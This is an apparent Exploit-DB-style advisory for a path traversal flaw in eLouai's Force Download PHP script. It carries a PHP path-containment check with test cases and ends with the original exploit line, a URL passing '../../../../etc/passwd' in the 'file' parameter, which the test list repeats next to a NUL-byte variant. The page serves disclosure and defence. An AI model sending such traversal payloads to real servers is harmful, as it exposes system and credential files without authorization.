Vendor: Force Download of media files script
By: v1R00Z
CVSS: 7.5 (HIGH)
CWE: 22 (Path Traversal)
Product Name: Force Download of media files script
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Ubuntu 10.10
2010

eLouai’s Force Download of media files script

eLouai's Force Download of media files script is vulnerable to path traversal, which allows an attacker to access arbitrary files and directories stored on the web server. By placing directory traversal sequences (../) in the 'file' parameter, an attacker can step out of the intended download directory and reach sensitive files and directories elsewhere on the file system.

Mitigation:

Input validation should be used to prevent path traversal attacks. All user-supplied input should be validated and filtered for malicious characters.
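
Character filtering alone is easy to get wrong, so the example below resolves the requested name to a canonical path and checks that it stays inside the media directory. It is an added example, not eLouai's code or a vendor patch; the function name resolve_download(), the directory layout and the sample files are assumptions constructed for the demonstration.

```php
<?php
// Added example: containment check for a download handler's 'file' parameter.
// resolve_download() and the directory layout are hypothetical, not eLouai's code.

function resolve_download(string $baseDir, string $requested): ?string
{
    // Reject empty names and NUL bytes outright.
    if ($requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() collapses ../, ./ and symlinks; false means the target does not exist.
    $target = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($target === false || !is_file($target)) {
        return null;
    }
    // Compare against base plus a trailing separator so /media-private does not match /media.
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $target;
}

// Constructed sandbox so the check can be exercised offline.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'dl_demo_' . bin2hex(random_bytes(4));
mkdir($root . '/media', 0700, true);
mkdir($root . '/media-private', 0700, true);
file_put_contents($root . '/media/song.mp3', 'constructed sample');
file_put_contents($root . '/media-private/keys.txt', 'constructed sample');

$cases = [
    'song.mp3',                   // inside the media directory: served
    '../../../../etc/passwd',     // value from the advisory: rejected
    '../media-private/keys.txt',  // sibling directory sharing the name prefix: rejected
    '/etc/passwd',                // absolute path: rejected
    "song.mp3\0.jpg",             // embedded NUL byte: rejected
];
foreach ($cases as $name) {
    $path = resolve_download($root . '/media', $name);
    printf("%-32s => %s\n", addcslashes($name, "\0"), $path === null ? 'rejected' : 'served');
}
```

In a real handler, only the path returned by the check should be passed to the file-reading call; the raw request value should never be.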

Exploit-DB raw data:

+---------------------------------------------------------------------------------------------+		
|
|[+] Exploit Title:  eLouai's Force Download of media files script														
|[+] Date: 2010-11-02
|[+] Author  : v1R00Z
|[+] Software Link: http://www.hotscripts.com/listing/elouais-force-download-script/
|[+] Tested on: Ubuntu 10.10
|[+] Contact : v_1_r@hotmail.com	
|[+] Website : http://evilzone.org/
|[+] Greeting: Evilzone, intern0t Cr3w
|
|[+] Exploit :
| 
|http://www.yoursite.com/force-download.php?file=../../../../etc/passwd
|
+----------------------------------------------------------------------------------------------+